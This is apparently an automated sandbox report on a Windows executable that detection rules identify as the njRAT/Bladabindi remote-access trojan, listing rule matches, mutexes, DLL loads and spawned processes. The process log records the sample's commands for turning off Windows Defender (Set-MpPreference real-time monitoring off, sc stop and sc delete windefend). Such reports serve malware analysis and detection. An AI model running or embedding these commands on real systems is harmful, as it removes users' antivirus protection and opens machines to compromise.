Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi

Source: G1lnGpOLK4.exe

Static PE information: Section: .reloc ZLIB complexity 0.99609375

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@37/7@13/6

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Mutant created: \Sessions\1\BaseNamedObjects\f2d4732908d59805d830a49d36974ac0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojnmq5j.r54.ps1

Jump to behavior

Source: G1lnGpOLK4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: G1lnGpOLK4.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: G1lnGpOLK4.exe	ReversingLabs: Detection: 68%
Source: G1lnGpOLK4.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

File read: C:\Users\user\Desktop\G1lnGpOLK4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\G1lnGpOLK4.exe "C:\Users\user\Desktop\G1lnGpOLK4.exe"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc query windefend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc delete windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc query windefend	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc delete windefend	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query windefend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop windefend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete windefend	Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: G1lnGpOLK4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll

Jump to behavior

Source: G1lnGpOLK4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: G1lnGpOLK4.exe, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E1443 push ebx; ret	0_2_00007FFD9B8E15EA
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E2354 push ecx; retf 485Fh	0_2_00007FFD9B8E3186
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E1EDA push ecx; retf 485Fh	0_2_00007FFD9B8E3186

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query windefend

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
